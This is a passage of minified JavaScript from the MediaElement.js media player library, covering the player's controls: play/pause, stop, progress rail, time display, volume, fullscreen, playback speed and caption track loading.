b=this,c=0,d=0,e=b.controls.find(".mejs-time-rail"),f=b.controls.find(".mejs-time-total"),g=e.siblings(),h=g.last(),i=null;if(b.container.is(":visible")&&e.length&&e.is(":visible")){b.options&&!b.options.autosizeProgress&&(d=parseInt(e.css("width"),10)),0!==d&&d||(g.each(function(){var b=a(this);"absolute"!=b.css("position")&&b.is(":visible")&&(c+=a(this).outerWidth(!0))}),d=b.controls.width()-c-(e.outerWidth(!0)-e.width()));do e.width(d),f.width(d-(f.outerWidth(!0)-f.width())),"absolute"!=h.css("position")&&(i=h.length?h.position():null,d--);while(null!==i&&i.top.toFixed(2)>0&&d>0);b.container.trigger("controlsresize")}},buildposter:function(b,c,d,e){var f=this,g=a('<div class="mejs-poster mejs-layer"></div>').appendTo(d),h=b.$media.attr("poster");""!==b.options.poster&&(h=b.options.poster),h?f.setPoster(h):g.hide(),e.addEventListener("play",function(){g.hide()},!1),b.options.showPosterWhenEnded&&b.options.autoRewind&&e.addEventListener("ended",function(){g.show()},!1)},setPoster:function(b){var c=this,d=c.container.find(".mejs-poster"),e=d.find("img");0===e.length&&(e=a('<img width="100%" height="100%" alt="" />').appendTo(d)),e.attr("src",b),d.css({"background-image":"url("+b+")"})},buildoverlays:function(b,c,d,e){var f=this;if(b.isVideo){var g=a('<div class="mejs-overlay mejs-layer"><div class="mejs-overlay-loading"><span></span></div></div>').hide().appendTo(d),h=a('<div class="mejs-overlay mejs-layer"><div class="mejs-overlay-error"></div></div>').hide().appendTo(d),i=a('<div class="mejs-overlay mejs-layer mejs-overlay-play"><div class="mejs-overlay-button"></div></div>').appendTo(d).bind("click",function(){f.options.clickToPlayPause&&e.paused&&e.play()});e.addEventListener("play",function(){i.hide(),g.hide(),c.find(".mejs-time-buffering").hide(),h.hide()},!1),e.addEventListener("playing",function(){i.hide(),g.hide(),c.find(".mejs-time-buffering").hide(),h.hide()},!1),e.addEventListener("seeking",function(){g.show(),c.find(".mejs-time-buffering").show()},!1),e.addEventListener("seeked",function(){g.hide(),c.find(".mejs-time-buffering").hide()},!1),e.addEventListener("pause",function(){mejs.MediaFeatures.isiPhone||i.show()},!1),e.addEventListener("waiting",function(){g.show(),c.find(".mejs-time-buffering").show()},!1),e.addEventListener("loadeddata",function(){g.show(),c.find(".mejs-time-buffering").show(),mejs.MediaFeatures.isAndroid&&(e.canplayTimeout=window.setTimeout(function(){if(document.createEvent){var a=document.createEvent("HTMLEvents");return a.initEvent("canplay",!0,!0),e.dispatchEvent(a)}},300))},!1),e.addEventListener("canplay",function(){g.hide(),c.find(".mejs-time-buffering").hide(),clearTimeout(e.canplayTimeout)},!1),e.addEventListener("error",function(a){f.handleError(a),g.hide(),i.hide(),h.show(),h.find(".mejs-overlay-error").html("Error loading this resource")},!1),e.addEventListener("keydown",function(a){f.onkeydown(b,e,a)},!1)}},buildkeyboard:function(b,c,d,e){var f=this;f.container.keydown(function(){f.keyboardAction=!0}),f.globalBind("keydown",function(c){return b.hasFocus=0!==a(c.target).closest(".mejs-container").length&&a(c.target).closest(".mejs-container").attr("id")===b.$media.closest(".mejs-container").attr("id"),f.onkeydown(b,e,c)}),f.globalBind("click",function(c){b.hasFocus=0!==a(c.target).closest(".mejs-container").length})},onkeydown:function(a,b,c){if(a.hasFocus&&a.options.enableKeyboard)for(var d=0,e=a.options.keyActions.length;e>d;d++)for(var f=a.options.keyActions[d],g=0,h=f.keys.length;h>g;g++)if(c.keyCode==f.keys[g])return"function"==typeof c.preventDefault&&c.preventDefault(),f.action(a,b,c.keyCode,c),!1;return!0},findTracks:function(){var b=this,c=b.$media.find("track");b.tracks=[],c.each(function(c,d){d=a(d),b.tracks.push({srclang:d.attr("srclang")?d.attr("srclang").toLowerCase():"",src:d.attr("src"),kind:d.attr("kind"),label:d.attr("label")||"",entries:[],isLoaded:!1})})},changeSkin:function(a){this.container[0].className="mejs-container "+a,this.setPlayerSize(this.width,this.height),this.setControlsSize()},play:function(){this.load(),this.media.play()},pause:function(){try{this.media.pause()}catch(a){}},load:function(){this.isLoaded||this.media.load(),this.isLoaded=!0},setMuted:function(a){this.media.setMuted(a)},setCurrentTime:function(a){this.media.setCurrentTime(a)},getCurrentTime:function(){return this.media.currentTime},setVolume:function(a){this.media.setVolume(a)},getVolume:function(){return this.media.volume},setSrc:function(a){this.media.setSrc(a)},remove:function(){var a,b,c=this;c.container.prev(".mejs-offscreen").remove();for(a in c.options.features)if(b=c.options.features[a],c["clean"+b])try{c["clean"+b](c)}catch(d){}c.isDynamic?c.$node.insertBefore(c.container):(c.$media.prop("controls",!0),c.$node.clone().insertBefore(c.container).show(),c.$node.remove()),"native"!==c.media.pluginType&&c.media.remove(),delete mejs.players[c.id],"object"==typeof c.container&&c.container.remove(),c.globalUnbind(),delete c.node.player},rebuildtracks:function(){var a=this;a.findTracks(),a.buildtracks(a,a.controls,a.layers,a.media)},resetSize:function(){var a=this;setTimeout(function(){a.setPlayerSize(a.width,a.height),a.setControlsSize()},50)}},function(){function b(b,d){var e={d:[],w:[]};return a.each((b||"").split(" "),function(a,b){var f=b+"."+d;0===f.indexOf(".")?(e.d.push(f),e.w.push(f)):e[c.test(b)?"w":"d"].push(f)}),e.d=e.d.join(" "),e.w=e.w.join(" "),e}var c=/^((after|before)print|(before)?unload|hashchange|message|o(ff|n)line|page(hide|show)|popstate|resize|storage)\b/;mejs.MediaElementPlayer.prototype.globalBind=function(c,d,e){var f=this,g=f.node?f.node.ownerDocument:document;c=b(c,f.id),c.d&&a(g).bind(c.d,d,e),c.w&&a(window).bind(c.w,d,e)},mejs.MediaElementPlayer.prototype.globalUnbind=function(c,d){var e=this,f=e.node?e.node.ownerDocument:document;c=b(c,e.id),c.d&&a(f).unbind(c.d,d),c.w&&a(window).unbind(c.w,d)}}(),"undefined"!=typeof a&&(a.fn.mediaelementplayer=function(b){return b===!1?this.each(function(){var b=a(this).data("mediaelementplayer");b&&b.remove(),a(this).removeData("mediaelementplayer")}):this.each(function(){a(this).data("mediaelementplayer",new mejs.MediaElementPlayer(this,b))}),this},a(document).ready(function(){a(".mejs-player").mediaelementplayer()})),window.MediaElementPlayer=mejs.MediaElementPlayer}(mejs.$),function(a){a.extend(mejs.MepDefaults,{playText:mejs.i18n.t("Play"),pauseText:mejs.i18n.t("Pause")}),a.extend(MediaElementPlayer.prototype,{buildplaypause:function(b,c,d,e){function f(a){"play"===a?(i.removeClass("mejs-play").addClass("mejs-pause"),j.attr({title:h.pauseText,"aria-label":h.pauseText})):(i.removeClass("mejs-pause").addClass("mejs-play"),j.attr({title:h.playText,"aria-label":h.playText}))}var g=this,h=g.options,i=a('<div class="mejs-button mejs-playpause-button mejs-play" ><button type="button" aria-controls="'+g.id+'" title="'+h.playText+'" aria-label="'+h.playText+'"></button></div>').appendTo(c).click(function(a){return a.preventDefault(),e.paused?e.play():e.pause(),!1}),j=i.find("button");f("pse"),e.addEventListener("play",function(){f("play")},!1),e.addEventListener("playing",function(){f("play")},!1),e.addEventListener("pause",function(){f("pse")},!1),e.addEventListener("paused",function(){f("pse")},!1)}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{stopText:"Stop"}),a.extend(MediaElementPlayer.prototype,{buildstop:function(b,c,d,e){var f=this;a('<div class="mejs-button mejs-stop-button mejs-stop"><button type="button" aria-controls="'+f.id+'" title="'+f.options.stopText+'" aria-label="'+f.options.stopText+'"></button></div>').appendTo(c).click(function(){e.paused||e.pause(),e.currentTime>0&&(e.setCurrentTime(0),e.pause(),c.find(".mejs-time-current").width("0px"),c.find(".mejs-time-handle").css("left","0px"),c.find(".mejs-time-float-current").html(mejs.Utility.secondsToTimeCode(0,b.options)),c.find(".mejs-currenttime").html(mejs.Utility.secondsToTimeCode(0,b.options)),d.find(".mejs-poster").show())})}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{progessHelpText:mejs.i18n.t("Use Left/Right Arrow keys to advance one second, Up/Down arrows to advance ten seconds.")}),a.extend(MediaElementPlayer.prototype,{buildprogress:function(b,c,d,e){a('<div class="mejs-time-rail"><span class="mejs-time-total mejs-time-slider"><span class="mejs-time-buffering"></span><span class="mejs-time-loaded"></span><span class="mejs-time-current"></span><span class="mejs-time-handle"></span><span class="mejs-time-float"><span class="mejs-time-float-current">00:00</span><span class="mejs-time-float-corner"></span></span></span></div>').appendTo(c),c.find(".mejs-time-buffering").hide();var f=this,g=c.find(".mejs-time-total"),h=c.find(".mejs-time-loaded"),i=c.find(".mejs-time-current"),j=c.find(".mejs-time-handle"),k=c.find(".mejs-time-float"),l=c.find(".mejs-time-float-current"),m=c.find(".mejs-time-slider"),n=function(a){var c,d=g.offset(),f=g.width(),h=0,i=0,j=0;c=a.originalEvent&&a.originalEvent.changedTouches?a.originalEvent.changedTouches[0].pageX:a.changedTouches?a.changedTouches[0].pageX:a.pageX,e.duration&&(c<d.left?c=d.left:c>f+d.left&&(c=f+d.left),j=c-d.left,h=j/f,i=.02>=h?0:h*e.duration,o&&i!==e.currentTime&&e.setCurrentTime(i),mejs.MediaFeatures.hasTouch||(k.css("left",j),l.html(mejs.Utility.secondsToTimeCode(i,b.options)),k.show()))},o=!1,p=!1,q=0,r=!1,s=b.options.autoRewind,t=function(a){var c=e.currentTime,d=mejs.i18n.t("Time Slider"),f=mejs.Utility.secondsToTimeCode(c,b.options),g=e.duration;m.attr({"aria-label":d,"aria-valuemin":0,"aria-valuemax":g,"aria-valuenow":c,"aria-valuetext":f,role:"slider",tabindex:0})},u=function(){var a=new Date;a-q>=1e3&&e.play()};m.bind("focus",function(a){b.options.autoRewind=!1}),m.bind("blur",function(a){b.options.autoRewind=s}),m.bind("keydown",function(a){new Date-q>=1e3&&(r=e.paused);var c=a.keyCode,d=e.duration,f=e.currentTime,g=b.options.defaultSeekForwardInterval(d),h=b.options.defaultSeekBackwardInterval(d);switch(c){case 37:case 40:f-=h;break;case 39:case 38:f+=g;break;case 36:f=0;break;case 35:f=d;break;case 32:case 13:return void(e.paused?e.play():e.pause());default:return}return f=0>f?0:f>=d?d:Math.floor(f),q=new Date,r||e.pause(),f<e.duration&&!r&&setTimeout(u,1100),e.setCurrentTime(f),a.preventDefault(),a.stopPropagation(),!1}),g.bind("mousedown touchstart",function(a){(1===a.which||0===a.which)&&(o=!0,n(a),f.globalBind("mousemove.dur touchmove.dur",function(a){n(a)}),f.globalBind("mouseup.dur touchend.dur",function(a){o=!1,k.hide(),f.globalUnbind(".dur")}))}).bind("mouseenter",function(a){p=!0,f.globalBind("mousemove.dur",function(a){n(a)}),mejs.MediaFeatures.hasTouch||k.show()}).bind("mouseleave",function(a){p=!1,o||(f.globalUnbind(".dur"),k.hide())}),e.addEventListener("progress",function(a){b.setProgressRail(a),b.setCurrentRail(a)},!1),e.addEventListener("timeupdate",function(a){b.setProgressRail(a),b.setCurrentRail(a),t(a)},!1),f.container.on("controlsresize",function(){b.setProgressRail(),b.setCurrentRail()}),f.loaded=h,f.total=g,f.current=i,f.handle=j},setProgressRail:function(a){var b=this,c=void 0!==a?a.target:b.media,d=null;c&&c.buffered&&c.buffered.length>0&&c.buffered.end&&c.duration?d=c.buffered.end(c.buffered.length-1)/c.duration:c&&void 0!==c.bytesTotal&&c.bytesTotal>0&&void 0!==c.bufferedBytes?d=c.bufferedBytes/c.bytesTotal:a&&a.lengthComputable&&0!==a.total&&(d=a.loaded/a.total),null!==d&&(d=Math.min(1,Math.max(0,d)),b.loaded&&b.total&&b.loaded.width(b.total.width()*d))},setCurrentRail:function(){var a=this;if(void 0!==a.media.currentTime&&a.media.duration&&a.total&&a.handle){var b=Math.round(a.total.width()*a.media.currentTime/a.media.duration),c=b-Math.round(a.handle.outerWidth(!0)/2);a.current.width(b),a.handle.css("left",c)}}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{duration:-1,timeAndDurationSeparator:"<span> | </span>"}),a.extend(MediaElementPlayer.prototype,{buildcurrent:function(b,c,d,e){var f=this;a('<div class="mejs-time" role="timer" aria-live="off"><span class="mejs-currenttime">'+mejs.Utility.secondsToTimeCode(0,b.options)+"</span></div>").appendTo(c),f.currenttime=f.controls.find(".mejs-currenttime"),e.addEventListener("timeupdate",function(){b.updateCurrent()},!1)},buildduration:function(b,c,d,e){var f=this;c.children().last().find(".mejs-currenttime").length>0?a(f.options.timeAndDurationSeparator+'<span class="mejs-duration">'+mejs.Utility.secondsToTimeCode(f.options.duration,f.options)+"</span>").appendTo(c.find(".mejs-time")):(c.find(".mejs-currenttime").parent().addClass("mejs-currenttime-container"),a('<div class="mejs-time mejs-duration-container"><span class="mejs-duration">'+mejs.Utility.secondsToTimeCode(f.options.duration,f.options)+"</span></div>").appendTo(c)),f.durationD=f.controls.find(".mejs-duration"),e.addEventListener("timeupdate",function(){b.updateDuration()},!1)},updateCurrent:function(){var a=this,b=a.media.currentTime;isNaN(b)&&(b=0),a.currenttime&&a.currenttime.html(mejs.Utility.secondsToTimeCode(b,a.options))},updateDuration:function(){var a=this,b=a.media.duration;a.options.duration>0&&(b=a.options.duration),isNaN(b)&&(b=0),a.container.toggleClass("mejs-long-video",b>3600),a.durationD&&b>0&&a.durationD.html(mejs.Utility.secondsToTimeCode(b,a.options))}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{muteText:mejs.i18n.t("Mute Toggle"),allyVolumeControlText:mejs.i18n.t("Use Up/Down Arrow keys to increase or decrease volume."),hideVolumeOnTouchDevices:!0,audioVolume:"horizontal",videoVolume:"vertical"}),a.extend(MediaElementPlayer.prototype,{buildvolume:function(b,c,d,e){if(!mejs.MediaFeatures.isAndroid&&!mejs.MediaFeatures.isiOS||!this.options.hideVolumeOnTouchDevices){var f=this,g=f.isVideo?f.options.videoVolume:f.options.audioVolume,h="horizontal"==g?a('<div class="mejs-button mejs-volume-button mejs-mute"><button type="button" aria-controls="'+f.id+'" title="'+f.options.muteText+'" aria-label="'+f.options.muteText+'"></button></div><a href="javascript:void(0);" class="mejs-horizontal-volume-slider"><span class="mejs-offscreen">'+f.options.allyVolumeControlText+'</span><div class="mejs-horizontal-volume-total"></div><div class="mejs-horizontal-volume-current"></div><div class="mejs-horizontal-volume-handle"></div></a>').appendTo(c):a('<div class="mejs-button mejs-volume-button mejs-mute"><button type="button" aria-controls="'+f.id+'" title="'+f.options.muteText+'" aria-label="'+f.options.muteText+'"></button><a href="javascript:void(0);" class="mejs-volume-slider"><span class="mejs-offscreen">'+f.options.allyVolumeControlText+'</span><div class="mejs-volume-total"></div><div class="mejs-volume-current"></div><div class="mejs-volume-handle"></div></a></div>').appendTo(c),i=f.container.find(".mejs-volume-slider, .mejs-horizontal-volume-slider"),j=f.container.find(".mejs-volume-total, .mejs-horizontal-volume-total"),k=f.container.find(".mejs-volume-current, .mejs-horizontal-volume-current"),l=f.container.find(".mejs-volume-handle, .mejs-horizontal-volume-handle"),m=function(a,b){if(!i.is(":visible")&&"undefined"==typeof b)return i.show(),m(a,!0),void i.hide();a=Math.max(0,a),a=Math.min(a,1),0===a?(h.removeClass("mejs-mute").addClass("mejs-unmute"),h.children("button").attr("title",mejs.i18n.t("Unmute")).attr("aria-label",mejs.i18n.t("Unmute"))):(h.removeClass("mejs-unmute").addClass("mejs-mute"),h.children("button").attr("title",mejs.i18n.t("Mute")).attr("aria-label",mejs.i18n.t("Mute")));var c=j.position();if("vertical"==g){var d=j.height(),e=d-d*a;l.css("top",Math.round(c.top+e-l.height()/2)),k.height(d-e),k.css("top",c.top+e)}else{var f=j.width(),n=f*a;l.css("left",Math.round(c.left+n-l.width()/2)),k.width(Math.round(n))}},n=function(a){var b=null,c=j.offset();if("vertical"===g){var d=j.height(),f=a.pageY-c.top;if(b=(d-f)/d,0===c.top||0===c.left)return}else{var h=j.width(),i=a.pageX-c.left;b=i/h}b=Math.max(0,b),b=Math.min(b,1),m(b),0===b?e.setMuted(!0):e.setMuted(!1),e.setVolume(b)},o=!1,p=!1;h.hover(function(){i.show(),p=!0},function(){p=!1,o||"vertical"!=g||i.hide()});var q=function(a){var b=Math.floor(100*e.volume);i.attr({"aria-label":mejs.i18n.t("Volume Slider"),"aria-valuemin":0,"aria-valuemax":100,"aria-valuenow":b,"aria-valuetext":b+"%",role:"slider",tabindex:0})};i.bind("mouseover",function(){p=!0}).bind("mousedown",function(a){return n(a),f.globalBind("mousemove.vol",function(a){n(a)}),f.globalBind("mouseup.vol",function(){o=!1,f.globalUnbind(".vol"),p||"vertical"!=g||i.hide()}),o=!0,!1}).bind("keydown",function(a){var b=a.keyCode,c=e.volume;switch(b){case 38:c=Math.min(c+.1,1);break;case 40:c=Math.max(0,c-.1);break;default:return!0}return o=!1,m(c),e.setVolume(c),!1}),h.find("button").click(function(){e.setMuted(!e.muted)}),h.find("button").bind("focus",function(){i.show()}),e.addEventListener("volumechange",function(a){o||(e.muted?(m(0),h.removeClass("mejs-mute").addClass("mejs-unmute")):(m(e.volume),h.removeClass("mejs-unmute").addClass("mejs-mute"))),q(a)},!1),0===b.options.startVolume&&e.setMuted(!0),"native"===e.pluginType&&e.setVolume(b.options.startVolume),f.container.on("controlsresize",function(){m(e.volume)})}}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{usePluginFullScreen:!0,newWindowCallback:function(){return""},fullscreenText:mejs.i18n.t("Fullscreen")}),a.extend(MediaElementPlayer.prototype,{isFullScreen:!1,isNativeFullScreen:!1,isInIframe:!1,fullscreenMode:"",buildfullscreen:function(b,c,d,e){if(b.isVideo){b.isInIframe=window.location!=window.parent.location,e.addEventListener("play",function(){b.detectFullscreenMode()});var f=this,g=null,h=a('<div class="mejs-button mejs-fullscreen-button"><button type="button" aria-controls="'+f.id+'" title="'+f.options.fullscreenText+'" aria-label="'+f.options.fullscreenText+'"></button></div>').appendTo(c).on("click",function(){var a=mejs.MediaFeatures.hasTrueNativeFullScreen&&mejs.MediaFeatures.isFullScreen()||b.isFullScreen;a?b.exitFullScreen():b.enterFullScreen()}).on("mouseover",function(){if("plugin-hover"==f.fullscreenMode){null!==g&&(clearTimeout(g),delete g);var a=h.offset(),c=b.container.offset();e.positionFullscreenButton(a.left-c.left,a.top-c.top,!0)}}).on("mouseout",function(){"plugin-hover"==f.fullscreenMode&&(null!==g&&(clearTimeout(g),delete g),g=setTimeout(function(){e.hideFullscreenButton()},1500))});if(b.fullscreenBtn=h,f.globalBind("keydown",function(a){27==a.keyCode&&(mejs.MediaFeatures.hasTrueNativeFullScreen&&mejs.MediaFeatures.isFullScreen()||f.isFullScreen)&&b.exitFullScreen()}),f.normalHeight=0,f.normalWidth=0,mejs.MediaFeatures.hasTrueNativeFullScreen){var i=function(a){b.isFullScreen&&(mejs.MediaFeatures.isFullScreen()?(b.isNativeFullScreen=!0,b.setControlsSize()):(b.isNativeFullScreen=!1,b.exitFullScreen()))};b.globalBind(mejs.MediaFeatures.fullScreenEventName,i)}}},detectFullscreenMode:function(){var a=this,b="",c=mejs.MediaFeatures;return c.hasTrueNativeFullScreen&&"native"===a.media.pluginType?b="native-native":c.hasTrueNativeFullScreen&&"native"!==a.media.pluginType&&!c.hasFirefoxPluginMovingProblem?b="plugin-native":a.usePluginFullScreen?mejs.MediaFeatures.supportsPointerEvents?(b="plugin-click",a.createPluginClickThrough()):b="plugin-hover":b="fullwindow",a.fullscreenMode=b,b},isPluginClickThroughCreated:!1,createPluginClickThrough:function(){var b=this;if(!b.isPluginClickThroughCreated){var c,d,e=!1,f=function(){if(e){for(var a in g)g[a].hide();b.fullscreenBtn.css("pointer-events",""),b.controls.css("pointer-events",""),b.media.removeEventListener("click",b.clickToPlayPauseCallback),e=!1}},g={},h=["top","left","right","bottom"],i=function(){var a=fullscreenBtn.offset().left-b.container.offset().left,d=fullscreenBtn.offset().top-b.container.offset().top,e=fullscreenBtn.outerWidth(!0),f=fullscreenBtn.outerHeight(!0),h=b.container.width(),i=b.container.height();for(c in g)g[c].css({position:"absolute",top:0,left:0});g.top.width(h).height(d),g.left.width(a).height(f).css({top:d}),g.right.width(h-a-e).height(f).css({top:d,left:a+e}),g.bottom.width(h).height(i-f-d).css({top:d+f})};for(b.globalBind("resize",function(){i()}),c=0,d=h.length;d>c;c++)g[h[c]]=a('<div class="mejs-fullscreen-hover" />').appendTo(b.container).mouseover(f).hide();fullscreenBtn.on("mouseover",function(){if(!b.isFullScreen){var a=fullscreenBtn.offset(),d=player.container.offset();media.positionFullscreenButton(a.left-d.left,a.top-d.top,!1),b.fullscreenBtn.css("pointer-events","none"),b.controls.css("pointer-events","none"),b.media.addEventListener("click",b.clickToPlayPauseCallback);for(c in g)g[c].show();i(),e=!0}}),media.addEventListener("fullscreenchange",function(a){b.isFullScreen=!b.isFullScreen,b.isFullScreen?b.media.removeEventListener("click",b.clickToPlayPauseCallback):b.media.addEventListener("click",b.clickToPlayPauseCallback),f()}),b.globalBind("mousemove",function(a){if(e){var c=fullscreenBtn.offset();(a.pageY<c.top||a.pageY>c.top+fullscreenBtn.outerHeight(!0)||a.pageX<c.left||a.pageX>c.left+fullscreenBtn.outerWidth(!0))&&(fullscreenBtn.css("pointer-events",""),b.controls.css("pointer-events",""),e=!1)}}),b.isPluginClickThroughCreated=!0}},cleanfullscreen:function(a){a.exitFullScreen()},containerSizeTimeout:null,enterFullScreen:function(){var b=this;return mejs.MediaFeatures.hasiOSFullScreen?void b.media.webkitEnterFullscreen():(a(document.documentElement).addClass("mejs-fullscreen"),b.normalHeight=b.container.height(),b.normalWidth=b.container.width(),"native-native"===b.fullscreenMode||"plugin-native"===b.fullscreenMode?(mejs.MediaFeatures.requestFullScreen(b.container[0]),b.isInIframe&&setTimeout(function c(){if(b.isNativeFullScreen){var d=.002,e=a(window).width(),f=screen.width,g=Math.abs(f-e),h=f*d;g>h?b.exitFullScreen():setTimeout(c,500)}},1e3)):"fullwindow"==b.fullscreeMode,b.container.addClass("mejs-container-fullscreen").width("100%").height("100%"),b.containerSizeTimeout=setTimeout(function(){b.container.css({width:"100%",height:"100%"}),b.setControlsSize()},500),"native"===b.media.pluginType?b.$media.width("100%").height("100%"):(b.container.find(".mejs-shim").width("100%").height("100%"),setTimeout(function(){var c=a(window),d=c.width(),e=c.height();b.media.setVideoSize(d,e)},500)),b.layers.children("div").width("100%").height("100%"),b.fullscreenBtn&&b.fullscreenBtn.removeClass("mejs-fullscreen").addClass("mejs-unfullscreen"),b.setControlsSize(),b.isFullScreen=!0,b.container.find(".mejs-captions-text").css("font-size",screen.width/b.width*1*100+"%"),b.container.find(".mejs-captions-position").css("bottom","45px"),void b.container.trigger("enteredfullscreen"))},exitFullScreen:function(){var b=this;clearTimeout(b.containerSizeTimeout),mejs.MediaFeatures.hasTrueNativeFullScreen&&(mejs.MediaFeatures.isFullScreen()||b.isFullScreen)&&mejs.MediaFeatures.cancelFullScreen(),a(document.documentElement).removeClass("mejs-fullscreen"),b.container.removeClass("mejs-container-fullscreen").width(b.normalWidth).height(b.normalHeight),"native"===b.media.pluginType?b.$media.width(b.normalWidth).height(b.normalHeight):(b.container.find(".mejs-shim").width(b.normalWidth).height(b.normalHeight),b.media.setVideoSize(b.normalWidth,b.normalHeight)),b.layers.children("div").width(b.normalWidth).height(b.normalHeight),b.fullscreenBtn.removeClass("mejs-unfullscreen").addClass("mejs-fullscreen"),b.setControlsSize(),b.isFullScreen=!1,b.container.find(".mejs-captions-text").css("font-size",""),b.container.find(".mejs-captions-position").css("bottom",""),b.container.trigger("exitedfullscreen")}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{speeds:["2.00","1.50","1.25","1.00","0.75"],defaultSpeed:"1.00",speedChar:"x"}),a.extend(MediaElementPlayer.prototype,{buildspeed:function(b,c,d,e){var f=this;if("native"==f.media.pluginType){for(var g=null,h=null,i=null,j=null,k=[],l=!1,m=0,n=f.options.speeds.length;n>m;m++){var o=f.options.speeds[m];"string"==typeof o?(k.push({name:o+f.options.speedChar,value:o}),o===f.options.defaultSpeed&&(l=!0)):(k.push(o),o.value===f.options.defaultSpeed&&(l=!0))}l||k.push({name:f.options.defaultSpeed+f.options.speedChar,value:f.options.defaultSpeed}),k.sort(function(a,b){return parseFloat(b.value)-parseFloat(a.value)});var p=function(a){for(m=0,n=k.length;n>m;m++)if(k[m].value===a)return k[m].name},q='<div class="mejs-button mejs-speed-button"><button type="button">'+p(f.options.defaultSpeed)+'</button><div class="mejs-speed-selector"><ul>';for(m=0,il=k.length;m<il;m++)j=f.id+"-speed-"+k[m].value,q+='<li><input type="radio" name="speed" value="'+k[m].value+'" id="'+j+'" '+(k[m].value===f.options.defaultSpeed?" checked":"")+' /><label for="'+j+'" '+(k[m].value===f.options.defaultSpeed?' class="mejs-speed-selected"':"")+">"+k[m].name+"</label></li>";q+="</ul></div></div>",g=a(q).appendTo(c),h=g.find(".mejs-speed-selector"),i=f.options.defaultSpeed,e.addEventListener("loadedmetadata",function(a){i&&(e.playbackRate=parseFloat(i))},!0),h.on("click",'input[type="radio"]',function(){var b=a(this).attr("value");i=b,e.playbackRate=parseFloat(b),g.find("button").html(p(b)),g.find(".mejs-speed-selected").removeClass("mejs-speed-selected"),g.find('input[type="radio"]:checked').next().addClass("mejs-speed-selected")}),g.one("mouseenter focusin",function(){h.height(g.find(".mejs-speed-selector ul").outerHeight(!0)+g.find(".mejs-speed-translations").outerHeight(!0)).css("top",-1*h.height()+"px")})}}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{startLanguage:"",tracksText:mejs.i18n.t("Captions/Subtitles"),tracksAriaLive:!1,hideCaptionsButtonWhenEmpty:!0,toggleCaptionsButtonWhenOnlyOne:!1,slidesSelector:""}),a.extend(MediaElementPlayer.prototype,{hasChapters:!1,cleartracks:function(a,b,c,d){a&&(a.captions&&a.captions.remove(),a.chapters&&a.chapters.remove(),a.captionsText&&a.captionsText.remove(),a.captionsButton&&a.captionsButton.remove())},buildtracks:function(b,c,d,e){if(0!==b.tracks.length){var f,g=this,h=g.options.tracksAriaLive?'role="log" aria-live="assertive" aria-atomic="false"':"";if(g.domNode.textTracks)for(f=g.domNode.textTracks.length-1;f>=0;f--)g.domNode.textTracks[f].mode="hidden";g.cleartracks(b,c,d,e),b.chapters=a('<div class="mejs-chapters mejs-layer"></div>').prependTo(d).hide(),b.captions=a('<div class="mejs-captions-layer mejs-layer"><div class="mejs-captions-position mejs-captions-position-hover" '+h+'><span class="mejs-captions-text"></span></div></div>').prependTo(d).hide(),b.captionsText=b.captions.find(".mejs-captions-text"),b.captionsButton=a('<div class="mejs-button mejs-captions-button"><button type="button" aria-controls="'+g.id+'" title="'+g.options.tracksText+'" aria-label="'+g.options.tracksText+'"></button><div class="mejs-captions-selector"><ul><li><input type="radio" name="'+b.id+'_captions" id="'+b.id+'_captions_none" value="none" checked="checked" /><label for="'+b.id+'_captions_none">'+mejs.i18n.t("None")+"</label></li></ul></div></div>").appendTo(c);var i=0;for(f=0;f<b.tracks.length;f++)"subtitles"==b.tracks[f].kind&&i++;for(g.options.toggleCaptionsButtonWhenOnlyOne&&1==i?b.captionsButton.on("click",function(){null===b.selectedTrack?lang=b.tracks[0].srclang:lang="none",b.setTrack(lang)}):(b.captionsButton.on("mouseenter focusin",function(){a(this).find(".mejs-captions-selector").removeClass("mejs-offscreen")}).on("click","input[type=radio]",function(){lang=this.value,b.setTrack(lang)}),b.captionsButton.on("mouseleave focusout",function(){a(this).find(".mejs-captions-selector").addClass("mejs-offscreen")})),b.options.alwaysShowControls?b.container.find(".mejs-captions-position").addClass("mejs-captions-position-hover"):b.container.bind("controlsshown",function(){b.container.find(".mejs-captions-position").addClass("mejs-captions-position-hover")}).bind("controlshidden",function(){e.paused||b.container.find(".mejs-captions-position").removeClass("mejs-captions-position-hover")}),b.trackToLoad=-1,b.selectedTrack=null,b.isLoadingTrack=!1,f=0;f<b.tracks.length;f++)"subtitles"==b.tracks[f].kind&&b.addTrackButton(b.tracks[f].srclang,b.tracks[f].label);b.loadNextTrack(),e.addEventListener("timeupdate",function(a){b.displayCaptions()},!1),""!==b.options.slidesSelector&&(b.slidesContainer=a(b.options.slidesSelector),e.addEventListener("timeupdate",function(a){b.displaySlides()},!1)),e.addEventListener("loadedmetadata",function(a){b.displayChapters()},!1),b.container.hover(function(){b.hasChapters&&(b.chapters.removeClass("mejs-offscreen"),b.chapters.fadeIn(200).height(b.chapters.find(".mejs-chapter").outerHeight()))},function(){b.hasChapters&&!e.paused&&b.chapters.fadeOut(200,function(){a(this).addClass("mejs-offscreen"),a(this).css("display","block")})}),g.container.on("controlsresize",function(){g.adjustLanguageBox()}),null!==b.node.getAttribute("autoplay")&&b.chapters.addClass("mejs-offscreen")}},setTrack:function(a){var b,c=this;if("none"==a)c.selectedTrack=null,c.captionsButton.removeClass("mejs-captions-enabled");else for(b=0;b<c.tracks.length;b++)if(c.tracks[b].srclang==a){null===c.selectedTrack&&c.captionsButton.addClass("mejs-captions-enabled"),c.selectedTrack=c.tracks[b],c.captions.attr("lang",c.selectedTrack.srclang),c.displayCaptions();break}},loadNextTrack:function(){var a=this;a.trackToLoad++,a.trackToLoad<a.tracks.length?(a.isLoadingTrack=!0,a.loadTrack(a.trackToLoad)):(a.isLoadingTrack=!1,a.checkForTracks())},loadTrack:function(b){var c=this,d=c.tracks[b],e=function(){d.isLoaded=!0,c.enableTrackButton(d.srclang,d.label),c.loadNextTrack()};a.ajax({url:d.src,dataType:"text",success:function(a){"string"==typeof a&&/<tt\s+xml/gi.exec(a)?d.entries=mejs.TrackFormatParser.dfxp.parse(a):d.entries=mejs.TrackFormatParser.webvtt.parse(a),e(),"chapters"==d.kind&&c.media.addEventListener("play",function(a){c.media.duration>0&&c.displayChapters(d)},!1),"slides"==d.kind&&c.setupSlides(d)},error:function(){c.removeTrackButton(d.srclang),c.loadNextTrack()}})},enableTrackButton:function(b,c){var 